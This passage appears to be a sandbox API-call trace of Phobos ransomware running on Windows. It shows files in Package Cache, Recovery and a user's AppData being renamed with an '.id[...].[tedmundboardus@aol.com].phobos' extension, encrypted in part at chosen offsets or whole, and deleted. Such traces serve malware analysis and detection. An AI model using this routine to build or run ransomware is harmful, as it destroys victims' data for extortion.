"c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0182.995] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0182.996] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0182.996] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0182.996] ReadFile (in: hFile=0x130, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0183.197] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x1de9f7, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0183.197] ReadFile (in: hFile=0x130, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0183.540] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x55bde5, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0183.540] ReadFile (in: hFile=0x130, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0183.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ae8) returned 1 [0183.791] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0183.791] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0183.800] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.800] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0183.800] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0183.828] SetEndOfFile (hFile=0x130) returned 1 [0183.842] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x55bde5, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0183.842] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0183.843] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x1de9f7, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0183.843] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0183.848] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0183.848] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0183.849] CloseHandle (hObject=0x130) returned 1 [0183.849] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0183.849] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0183.850] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4932896) returned 1 [0183.850] CloseHandle (hObject=0x130) returned 1 [0183.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0183.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0184.028] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.028] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.028] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.028] ReadFile (in: hFile=0x130, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.084] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x19170a, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.084] ReadFile (in: hFile=0x130, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.112] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x474520, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.112] ReadFile (in: hFile=0x130, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ca8) returned 1 [0184.120] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.120] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0184.126] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.126] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0184.126] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0184.145] SetEndOfFile (hFile=0x130) returned 1 [0184.145] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x474520, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.145] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.147] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x19170a, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.147] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.149] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.149] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.150] CloseHandle (hObject=0x130) returned 1 [0184.150] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.150] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.151] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3170304) returned 1 [0184.151] CloseHandle (hObject=0x130) returned 1 [0184.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi")) returned 0x2006 [0184.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0184.153] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.153] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.153] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.153] ReadFile (in: hFile=0x130, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.205] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x102000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.205] ReadFile (in: hFile=0x130, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.229] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x2c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0184.229] ReadFile (in: hFile=0x130, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0184.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ae8) returned 1 [0184.264] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.264] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0184.270] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.270] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0184.270] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0184.283] SetEndOfFile (hFile=0x130) returned 1 [0184.283] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x2c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.283] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.285] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x102000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.285] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.286] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0184.286] WriteFile (in: hFile=0x130, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0184.288] CloseHandle (hObject=0x130) returned 1 [0184.288] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.303] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15440) returned 1 [0184.303] CloseHandle (hObject=0x178) returned 1 [0184.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe")) returned 0x80 [0184.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.305] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.305] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3c50, lpOverlapped=0x0) returned 1 [0184.354] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c60, dwBufLen=0x3c60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c60) returned 1 [0184.354] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3c60, lpOverlapped=0x0) returned 1 [0184.355] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a68) returned 1 [0184.355] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.355] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0184.355] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.355] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0184.355] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.355] CloseHandle (hObject=0x178) returned 1 [0184.355] CloseHandle (hObject=0x134) returned 1 [0184.355] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe")) returned 1 [0184.356] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.357] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=17104) returned 1 [0184.357] CloseHandle (hObject=0x134) returned 1 [0184.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms")) returned 0x2020 [0184.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.357] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, 